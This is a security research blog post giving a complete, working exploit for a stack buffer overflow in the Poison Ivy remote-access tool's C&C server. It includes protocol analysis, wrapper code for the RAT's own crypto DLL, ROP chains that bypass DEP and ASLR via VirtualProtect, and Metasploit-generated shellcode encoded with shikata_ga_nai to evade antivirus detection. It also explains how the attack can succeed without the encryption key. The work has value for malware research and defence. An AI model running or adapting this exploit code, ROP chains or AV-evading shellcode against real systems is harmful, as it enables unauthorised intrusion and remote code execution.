While working on Poison Ivy’s communication, one of my students approached me and asked me if the fact that an infected computer can connect to the C&C server means that the compromised host can break into the server. Well folks, it appears that it’s possible. We will now present a fully working exploit for all Windows platforms (i.e., bypassing DEP and ASLR), allowing a computer infected by Poison Ivy (or any other computer, for that matter) to assume control of PI’s C&C server.
As we already know, Poison Ivy’s initial communication sequence goes as follows:
1. The client contacts the server and sends 256 bytes of data (challenge).
2. The server encrypts the data and sends it back (response).
3. The server sends an encrypted command (machine code) to the client (preceded by a cleartext length DWORD).
4. The client sends the infected computer’s encrypted details to the server.
Steps 3 and 4 are somewhat interchangeable. In any case, we’ll be attacking step 4. This sort of attack has already been investigated by Andrzej Dereszowski, but some details were omitted, and the exploit was very limited in nature (and not disclosed).
First, let’s see what bytes the client sends to the server in step 4:
unsigned char client_details[] =
{
0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0xC0, 0x00, 0x00, 0x00, 0xBB, 0x00, 0x00, 0x00,
0xC2, 0x00, 0x00, 0x00, 0xC2, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xB8, 0xB0, 0x00, 0x00, 0x00, 0x09, 0x6D, 0x79, 0x70, 0x72, 0x6F, 0x00, 0x66, 0x67, 0x61, 0x6C,
0x00, 0xC0, 0xA8, 0x0D, 0x00, 0x01, 0x02, 0x58, 0x33, 0x04, 0x55, 0x73, 0x65, 0x80, 0x72, 0x01,
0x9C, 0x00, 0x00, 0x00, 0x05, 0x00, 0x18, 0x82, 0x01, 0x00, 0x0C, 0x28, 0x0A, 0x00, 0x00, 0x02,
0x00, 0x1C, 0x00, 0x53, 0x65, 0x72, 0x76, 0x69, 0x63, 0x65, 0x20, 0x00, 0x50, 0x61, 0x63, 0x6B,
0x20, 0x33, 0x00, 0x7C, 0x01, 0x00, 0x48, 0x00, 0x6E, 0x00, 0x70, 0x00, 0x48, 0xBB, 0x00, 0x14,
0x00, 0x00, 0xE0, 0xFD, 0x7F, 0x94, 0xFE, 0x80, 0x9F, 0x00, 0x17, 0x83, 0x91, 0x7C, 0x35, 0x00,
0x06, 0x00, 0x00, 0x1E, 0x15, 0x00, 0x08, 0x00, 0xA0, 0x00, 0x80, 0xE0, 0x50, 0x88, 0x7C, 0x00,
0x3E, 0x15, 0x01, 0x54, 0x80, 0x00, 0xE8, 0xE0, 0x80, 0x7C, 0xF8, 0x1D, 0x01, 0x16, 0x30, 0x14,
0x00, 0x0C, 0x01, 0x00, 0xB2, 0x00, 0x46, 0x00, 0x00, 0xB8, 0x14, 0x00, 0xA0, 0x00, 0x37, 0x01,
0x2F, 0x01, 0x0B, 0xAC, 0x00, 0x0B, 0x20, 0xC3, 0x31, 0x91, 0x7C, 0xDF, 0x00, 0x03, 0x08, 0x06,
0xD6, 0x14, 0x02, 0x43, 0x00, 0x29, 0x00, 0x01, 0x03, 0x03, 0x01, 0x45, 0x00, 0x37, 0x00, 0x66,
0x2F, 0x5F, 0x47, 0x00, 0xC0, 0xF7, 0x1F, 0x02, 0xE7, 0x00, 0x0F, 0x00, 0x00, 0x00, 0x00, 0x00,
};
The data given here provides the server with the following information:
When analyzing the PI server (it’s packed with ExeStealth, BTW), we see that it first reads 0x20 bytes of client data (i.e., the header), parses that header, and acts accordingly. Some interesting values in the header:
- The 1st DWORD is either 4 or not. A value of 4 involves taking a different branch that doesn’t interest us.
- The 3rd DWORD indicates the number of additional bytes to read from the socket after reading the header (i.e., the data).
- The 4th DWORD is the number of relevant data bytes in the data that’s going to be read from the socket.
- The 5th DWORD is the real size of the relevant data. If this is bigger than the 4th DWORD, the read data should be decompressed using RtlDecompressBuffer.
- The 6th DWORD is the size of the buffer to allocate for the (uncompressed) relevant data. This has nothing to do with the buffer for reading the data from the socket, which is simply a local array variable, residing on the stack.
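To make the layout above concrete, here is a minimal sketch that decodes the six described DWORDs from a decrypted 0x20-byte header. The struct and field names are hypothetical (only the positions and meanings come from the list above), and the sample bytes are the first 0x20 bytes of the `client_details` dump shown earlier.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define PI_HEADER_SIZE 0x20

/* Hypothetical names; only the DWORD positions are taken from the analysis. */
typedef struct {
    uint32_t type;           /* 1st DWORD: 4 selects a different branch       */
    uint32_t unknown;        /* 2nd DWORD: not described in the text          */
    uint32_t bytes_to_read;  /* 3rd DWORD: bytes to read after the header     */
    uint32_t relevant_size;  /* 4th DWORD: relevant bytes within that data    */
    uint32_t real_size;      /* 5th DWORD: size after decompression           */
    uint32_t alloc_size;     /* 6th DWORD: buffer size for uncompressed data  */
} pi_header_t;

/* Read a little-endian 32-bit value regardless of host byte order. */
uint32_t read_le32(const unsigned char *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

pi_header_t parse_pi_header(const unsigned char *buf) {
    pi_header_t h;
    assert(buf != NULL);
    h.type          = read_le32(buf + 0);
    h.unknown       = read_le32(buf + 4);
    h.bytes_to_read = read_le32(buf + 8);
    h.relevant_size = read_le32(buf + 12);
    h.real_size     = read_le32(buf + 16);
    h.alloc_size    = read_le32(buf + 20);
    return h;
}

/* Per the text: data is decompressed when the real size exceeds the relevant size. */
int is_compressed(const pi_header_t *h) {
    return h->real_size > h->relevant_size;
}

/* First 0x20 bytes of the client_details dump from the post. */
const unsigned char sample_header[PI_HEADER_SIZE] = {
    0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
    0xC0, 0x00, 0x00, 0x00, 0xBB, 0x00, 0x00, 0x00,
    0xC2, 0x00, 0x00, 0x00, 0xC2, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
};
```

Calling `parse_pi_header(sample_header)` yields 0xC0 bytes to read, of which 0xBB are relevant, with a real size of 0xC2. Since 0xC2 is bigger than 0xBB, this sample would take the decompression path.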
If you think this construction is weird, you’re absolutely right. Either the author did it so he can have a backdoor via an exploit, or I’m giving him way too much credit. Either way, this header screams “exploit me!”, and in this case, I don’t mind being a pleaser.
First things first. If we want to send our own header, we need to encrypt it. We use what we already know about Poison Ivy’s crypto system, and put PI’s own PILib.dll to work for us:
#ifndef CAMELLIA_H
#define CAMELLIA_H
#include <windows.h>
#define CAMELLIA_LIBRARY "PILIB.DLL"
#define CAMELLIA_SCHEDULE_KEYS "C_SK"
#define CAMELLIA_ENCRYPT "C_E"
#define CAMELLIA_DECRYPT "C_D"
#define CAMELLIA_BLOCK_SIZE 16
#define CAMELLIA_KEY_LEN (256 / 8)
/* Not accurate - just needs to be big enough */
#define CAMELLIA_ALL_KEYS_LEN 1024
int loadCamellia(const char *key, unsigned int len);
/* encrypt() and decrypt() require len to be a multiple of CAMELLIA_BLOCK_SIZE */
void encrypt(unsigned char *data, int len);
void decrypt(unsigned char *data, int len);
void unloadCamellia();
#endif
And the actual code (note that Camellia is a block cipher):
#include <windows.h>
#include <string.h>
#include "Camellia.h"

/* Signatures of the three functions exported by PILib.dll */
typedef int (__stdcall *c_sk_t)(unsigned char *, unsigned char *);
typedef int (__stdcall *c_e_t)(unsigned char *, unsigned char *, unsigned char *);
typedef int (__stdcall *c_d_t)(unsigned char *, unsigned char *, unsigned char *);

HMODULE hMod = NULL;
c_sk_t c_sk = NULL;
c_e_t c_e = NULL;
c_d_t c_d = NULL;
unsigned char all_keys[CAMELLIA_ALL_KEYS_LEN] = {0};

int loadCamellia(const char *key, unsigned int len) {
    unsigned char c_key[CAMELLIA_KEY_LEN] = {0};

    if ((hMod = LoadLibrary(CAMELLIA_LIBRARY)) == NULL)
        return FALSE;
    if ((c_sk = (c_sk_t)GetProcAddress(hMod, CAMELLIA_SCHEDULE_KEYS)) == NULL ||
        (c_e = (c_e_t)GetProcAddress(hMod, CAMELLIA_ENCRYPT)) == NULL ||
        (c_d = (c_d_t)GetProcAddress(hMod, CAMELLIA_DECRYPT)) == NULL) {
        FreeLibrary(hMod);
        hMod = NULL; /* So that unloadCamellia() doesn't free the library twice */
        return FALSE;
    }
    /* The password is zero-padded (or truncated) to the key length */
    memcpy(c_key, key, len <= CAMELLIA_KEY_LEN ? len : CAMELLIA_KEY_LEN);
    c_sk(c_key, all_keys);
    return TRUE;
}

void encrypt(unsigned char *data, int len) {
    int idx;

    /* Make sure the library is loaded and len is a multiple of CAMELLIA_BLOCK_SIZE */
    if (c_e == NULL || len % CAMELLIA_BLOCK_SIZE > 0)
        return;
    /* Each block is encrypted in place, independently of the others */
    for (idx = 0; idx < len; idx += CAMELLIA_BLOCK_SIZE)
        c_e(data + idx, data + idx, all_keys);
}

void decrypt(unsigned char *data, int len) {
    int idx;

    /* Make sure the library is loaded and len is a multiple of CAMELLIA_BLOCK_SIZE */
    if (c_d == NULL || len % CAMELLIA_BLOCK_SIZE > 0)
        return;
    for (idx = 0; idx < len; idx += CAMELLIA_BLOCK_SIZE)
        c_d(data + idx, data + idx, all_keys);
}

void unloadCamellia() {
    if (hMod != NULL) {
        FreeLibrary(hMod);
        hMod = NULL;
    }
}
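Because `encrypt()` and `decrypt()` silently return when the length is not a multiple of the block size, a caller may want to check or round up lengths first. The following is a small sketch with hypothetical helper names; it assumes only the 16-byte block size defined in the header above.

```c
#include <assert.h>
#include <stddef.h>

#define BLOCK_SIZE 16 /* Same value as CAMELLIA_BLOCK_SIZE */

/* Returns nonzero when len can be passed to encrypt()/decrypt() as is. */
int is_block_aligned(size_t len) {
    return len % BLOCK_SIZE == 0;
}

/* Rounds len up to the next multiple of the block size. */
size_t round_up_to_block(size_t len) {
    assert(len <= (size_t)-1 - (BLOCK_SIZE - 1)); /* Guard against overflow */
    return (len + BLOCK_SIZE - 1) / BLOCK_SIZE * BLOCK_SIZE;
}
```

The 0x20-byte header is already two full blocks. As a side observation, rounding the sample header's 0xBB relevant bytes up to a block boundary gives 0xC0, which matches the 3rd DWORD of that header; this would be consistent with block padding, although nothing in the analysis confirms that this is how PI computes it.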
PI’s C&C server creates a thread for each new connection. It’s that thread’s function that has the vulnerability. Here’s the buffer that we want to overflow:
Now, to the exploit. We want to indicate that there’s a lot of data to be sent. However, we don’t want to send that much data, because if we break the connection we can quickly get to the overwritten return address. We must keep in mind, though, that we can’t break the connection before all of the data we wanted to send was actually received by the other side. This way, we get both the overflow, and the quick exit. We also note that PI was built so that threads can terminate without affecting the server, which is an attribute we’re going to use to exit cleanly from our shellcode.
Ok, so we can overwrite the return address, but where should we point it to? The thread’s stack is not executable, and we don’t even know where it is. However, the PI server’s executable doesn’t support ASLR, so we know exactly where its code is loaded (as a side note, all of its sections are marked RWX). We’re going to construct a ROP chain that calls VirtualProtect and makes the stack executable, so we can run our code. The problem is that we don’t have much of a stack to work with when the function returns, given that this function is called directly by CreateThread. This is all the stack space we have:
So, with the help of mona.py, we manually create a ROP chain to take us back 0x8000 bytes to where the stack was, so we can have a bigger ROP chain there that calls VirtualProtect on 0x4000 stack bytes (which is more than enough for any shellcode you might want to run). One last thing to remember is that EIP and ESP are the same when the shellcode starts to run, so it’s important not to write things on the stack that will destroy the shellcode. We deal with it by subtracting 0x40 from ESP upon entering our shellcode, so we have some space for local variables.
See the inline comments in the code below for specific details on the ROP chains and the shellcode:
/* Poison Ivy own-the-owner exploit by Gal Badishi, http://www.badishi.com */
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <winsock2.h>
#include <stdlib.h>
#include <stdio.h>
#include "Camellia.h"
#define PI_CLIENT_PASS "admin"
#define PI_CLIENT_PASS_LEN 5
#define PI_SERVER_IP "192.168.13.2"
#define PI_SERVER_PORT 3460
#define HANDSHAKE_SIZE 256
#define CLIENT_DETAILS_SIZE 0x8095
#define CLIENT_DETAILS_HEADER_SIZE 0x20
#define SHORT_ROP_CHAIN_POS 0x806D // Overwritten return address is here
#define LONG_ROP_CHAIN_POS (SHORT_ROP_CHAIN_POS - 0x7FF0)
/*
* The buffer is long enough for an overflow, but all we need is the first 0x20 header bytes.
* To get straight to the end of the function after the overflow, we declare a bigger size
* than our actual buffer (0x10000 vs. 0x8095), and drop the connection after sending our buf.
* These 0x20 bytes are the only things that need to get encrypted. In fact, it might work
* even without encryption! (Thus, you might not need to know the password, but then you
* might not succeed on the first shot, and you'll have to at least play with the size.)
* The number of bytes after the header is given by the 3rd DWORD in the header.
*/
unsigned char client_details[CLIENT_DETAILS_SIZE] =
{
0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0xBB, 0x00, 0x00, 0x00,
0xC2, 0x00, 0x00, 0x00, 0xC2, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
};
unsigned int short_ROP_chain[] = {
0x0041F1E9, // 1st jump - will put esp (8 bytes from here) into ecx: push esp # and al,4 # pop ecx # pop edx # retn
0x00401000, // Readable/writeable - will be cleaned by original ret 4 (esp will point to the next dword)
0xFFFF8000, // edx. We'll add this number later to ebp (which will subtract 0x8000 from it).
0x0042F63A, // Will put esp into ebp: push esp # pop ebp # pop edi # pop esi # pop ebx # retn
0x00000000, // edi (ebp points here now)
0x00000000, // esi
0x00000000, // ebx
0x00426799, // We need this to offset ebp: mov eax,edx # retn
0x0041F337, // Subtract 0x8000 from ebp: add ebp,eax # retn
0x00403A77 // mov esp,ebp # pop ebp # retn
};
unsigned int long_ROP_chain[] = {
0x00000000, // New ebp
0x0041F1E9, // Will put esp (8 bytes from here) into ecx: push esp # and al,4 # pop ecx # pop edx # retn
0x0000002C, // edx. We'll add this number later to ebp, to prevent looping.
0x0042F63A, // Will put esp into ebp: push esp # pop ebp # pop edi # pop esi # pop ebx # retn
0x00000001, // edi. We need it when we call VirtualProtect (ebp points here now)
0x00000000, // esi
0x00000000, // ebx
0x00426799, // We need this to offset ebp: mov eax,edx # retn
0x0041F337, // Add 0x2C (from edx above) to ebp: add ebp,eax # retn
0x004D82DE, // eax will now point 8 bytes from the beginning of the bigger ROP chain: mov eax,ecx # retn
0x004F196E, // push eax (address) and call VirtualProtect, then add ebx, 0x28 # mov edi, 0x46FAC1 # pop esi # pop ebx # mov esp, ebp # pop ebp # ret 8
0x00004000, // Size
0x00000040, // New protect (0x40 = PAGE_EXECUTE_READWRITE)
0x00401000, // Old protect (ptr)
0x00000000, // esi
0x00000000, // ebx. ebp will point here after the offset, meaning that esp will point here after VirtualProtect.
0x0041AA97, // jmp esp (also new ebp)
0x00000000, // Discarded
0x00000000 // Discarded
// The shellcode goes here (this is going to be esp)
};
/*
* windows/exec
* http://www.metasploit.com
* VERBOSE=false, EXITFUNC=thread,
* CMD=calc.exe
*
* Encoded using shikata_ga_nai due to AV detection
*/
unsigned char payload[] =
"\x83\xec\x40" // sub esp,40 - esp is our eip and that's a problem
"\xdd\xc4\xd9\x74\x24\xf4\x5d\x31\xc9\xb1\x33\xb8\x7f\x6b\x1c"
"\xe9\x83\xed\xfc\x31\x45\x13\x03\x3a\x78\xfe\x1c\x38\x96\x77"
"\xde\xc0\x67\xe8\x56\x25\x56\x3a\x0c\x2e\xcb\x8a\x46\x62\xe0"
"\x61\x0a\x96\x73\x07\x83\x99\x34\xa2\xf5\x94\xc5\x02\x3a\x7a"
"\x05\x04\xc6\x80\x5a\xe6\xf7\x4b\xaf\xe7\x30\xb1\x40\xb5\xe9"
"\xbe\xf3\x2a\x9d\x82\xcf\x4b\x71\x89\x70\x34\xf4\x4d\x04\x8e"
"\xf7\x9d\xb5\x85\xb0\x05\xbd\xc2\x60\x34\x12\x11\x5c\x7f\x1f"
"\xe2\x16\x7e\xc9\x3a\xd6\xb1\x35\x90\xe9\x7e\xb8\xe8\x2e\xb8"
"\x23\x9f\x44\xbb\xde\x98\x9e\xc6\x04\x2c\x03\x60\xce\x96\xe7"
"\x91\x03\x40\x63\x9d\xe8\x06\x2b\x81\xef\xcb\x47\xbd\x64\xea"
"\x87\x34\x3e\xc9\x03\x1d\xe4\x70\x15\xfb\x4b\x8c\x45\xa3\x34"
"\x28\x0d\x41\x20\x4a\x4c\x0f\xb7\xde\xea\x76\xb7\xe0\xf4\xd8"
"\xd0\xd1\x7f\xb7\xa7\xed\x55\xfc\x48\x0c\x7c\x08\xe1\x89\x15"
"\xb1\x6c\x2a\xc0\xf5\x88\xa9\xe1\x85\x6e\xb1\x83\x80\x2b\x75"
"\x7f\xf8\x24\x10\x7f\xaf\x45\x31\x1c\x2e\xd6\xd9\xcd\xd5\x5e"
"\x7b\x12";
/* Print an error, release everything we hold, and exit */
void bail_out(const char *msg, SOCKET sock) {
    printf("%s\n", msg);
    if (sock != INVALID_SOCKET) {
        shutdown(sock, SD_BOTH);
        closesocket(sock);
        WSACleanup();
    }
    unloadCamellia();
    exit(1);
}

SOCKET connect_to_PI_server(const char *ip, unsigned short port) {
    unsigned long ulAddr;
    struct sockaddr_in addr;
    WSADATA wsaData;
    SOCKET sock;

    if ((ulAddr = inet_addr(ip)) == INADDR_NONE || ulAddr == INADDR_ANY)
        bail_out("Wrong IP address format", INVALID_SOCKET);
    if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0)
        bail_out("Cannot initialize Winsock", INVALID_SOCKET);
    if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) {
        WSACleanup();
        bail_out("Cannot create socket", INVALID_SOCKET);
    }
    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_addr.s_addr = ulAddr;
    addr.sin_port = htons(port);
    if (connect(sock, (const struct sockaddr *) &addr, sizeof(addr)) == SOCKET_ERROR)
        bail_out("Cannot connect to PI server", sock);
    return sock;
}

/* Send 256 bytes of data (challenge) and get them encrypted (response) */
void handshake(SOCKET sock) {
    char buf[HANDSHAKE_SIZE] = {0};

    if (send(sock, buf, HANDSHAKE_SIZE, 0) == SOCKET_ERROR)
        bail_out("Cannot send handshake", sock);
    if (recv(sock, buf, HANDSHAKE_SIZE, 0) < HANDSHAKE_SIZE)
        bail_out("Error receiving handshake", sock);
}

/* Read and discard the command the server sends (cleartext length DWORD, then the data) */
void recv_command(SOCKET sock) {
    int len, recv_len;
    char temp[0x100];

    /* Cast sizeof to int: otherwise a -1 from recv() is compared as unsigned and the error is missed */
    if (recv(sock, (char *) &len, sizeof(len), 0) < (int) sizeof(len))
        bail_out("Cannot get command size", sock);
    printf("Waiting for command...\n");
    Sleep(2000);
    do {
        int bytes_to_read = len > 0x100 ? 0x100 : len;
        if ((recv_len = recv(sock, temp, bytes_to_read, 0)) < bytes_to_read)
            bail_out("Cannot get command", sock);
        len -= recv_len;
    } while (len > 0);
}

void send_exploit(SOCKET sock) {
    char client_details_enc[CLIENT_DETAILS_SIZE];
    int sent;

    memcpy(client_details_enc, client_details, CLIENT_DETAILS_SIZE);
    /* Only the header is encrypted; the rest of the buffer is sent as is */
    encrypt((unsigned char *) client_details_enc, CLIENT_DETAILS_HEADER_SIZE);
    memcpy(client_details_enc + SHORT_ROP_CHAIN_POS, short_ROP_chain, sizeof(short_ROP_chain));
    memcpy(client_details_enc + LONG_ROP_CHAIN_POS, long_ROP_chain, sizeof(long_ROP_chain));
    /* The payload comes directly after the long ROP chain */
    memcpy(client_details_enc + LONG_ROP_CHAIN_POS + sizeof(long_ROP_chain), payload, sizeof(payload));
    sent = send(sock, client_details_enc, CLIENT_DETAILS_SIZE, 0);
    printf("Sent 0x%X/0x%X bytes\n", sent, CLIENT_DETAILS_SIZE);
}

int main(void) {
    SOCKET sock = INVALID_SOCKET;

    if (!loadCamellia(PI_CLIENT_PASS, PI_CLIENT_PASS_LEN))
        bail_out("Cannot load Camellia DLL", INVALID_SOCKET);
    sock = connect_to_PI_server(PI_SERVER_IP, PI_SERVER_PORT);
    handshake(sock);
    recv_command(sock);
    send_exploit(sock);
    /* Give the server time to receive everything before we drop the connection */
    printf("Count to 5...\n");
    Sleep(5000);
    shutdown(sock, SD_BOTH);
    closesocket(sock);
    WSACleanup();
    unloadCamellia();
    printf("Finished - Check to see if the exploit worked.\n");
    return 0;
}
The exploit was tested on Windows XP Service Pack 3, but should work without any problem on all Windows versions, as it bypasses DEP (using ROP chains and VirtualProtect) and ASLR (using the fact that the executable doesn’t support rebasing, and utilizing only relative addresses).
[Screenshots: the exploiter’s view and the PI C&C server’s view]
Although the exploit presented here uses Poison Ivy’s own PILib.dll to encrypt the communication to the server, and thus the correct encryption key/password is needed, we can perform the exploitation quite reliably even without encrypting the data. For the exploit to be reliable, the server needs to see two things after decrypting the header:
- The first DWORD should not be 4.
- The third DWORD should be higher than the actual size of the data we send (minus the header).
For the first point, out of about 4 billion numbers, only one poses a problem. In fact, we can just send the number 4, and assume that it’s not going to get decrypted back to 4 (that would require the decryption to leave the value unchanged). As for the second point, we observe that we send 0x8095 bytes, meaning that it suffices for the 3rd DWORD in the header to have one of its higher bytes not equal to 0 after decryption. Following the same logic we used before, we can simply send zeros as the higher bytes.
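The odds in this argument can be put into numbers with a short back-of-the-envelope sketch. It assumes (this is an assumption, not something measured) that decrypting an unencrypted header with the server's key yields values that behave like uniformly random 32-bit numbers; the function names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

#define DWORD_SPACE 4294967296.0 /* 2^32 possible DWORD values */

/* Chance that the decrypted 1st DWORD happens to be exactly 4. */
double p_first_dword_is_4(void) {
    return 1.0 / DWORD_SPACE;
}

/* Chance that the decrypted 3rd DWORD is NOT higher than the number of
 * bytes sent after the header (values 0..bytes_after_header all fail). */
double p_third_dword_too_small(uint32_t bytes_after_header) {
    return ((double)bytes_after_header + 1.0) / DWORD_SPACE;
}

/* Upper bound (union bound) on the chance that one unencrypted attempt fails. */
double p_unencrypted_attempt_fails(uint32_t total_sent, uint32_t header_size) {
    assert(total_sent >= header_size);
    return p_first_dword_is_4() +
           p_third_dword_too_small(total_sent - header_size);
}
```

With the sizes used in this post, `p_unencrypted_attempt_fails(0x8095, 0x20)` comes out at roughly 7.7 in a million, almost all of it from the 3rd DWORD condition. Under the stated assumption, this supports the claim that the unencrypted variant is quite reliable.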
It’s important to note that the exploit data following our header never gets decrypted, so we don’t have to worry about PI ruining our values if we don’t encrypt the data.
In light of this analysis, a Metasploit module without encryption is being prepared.





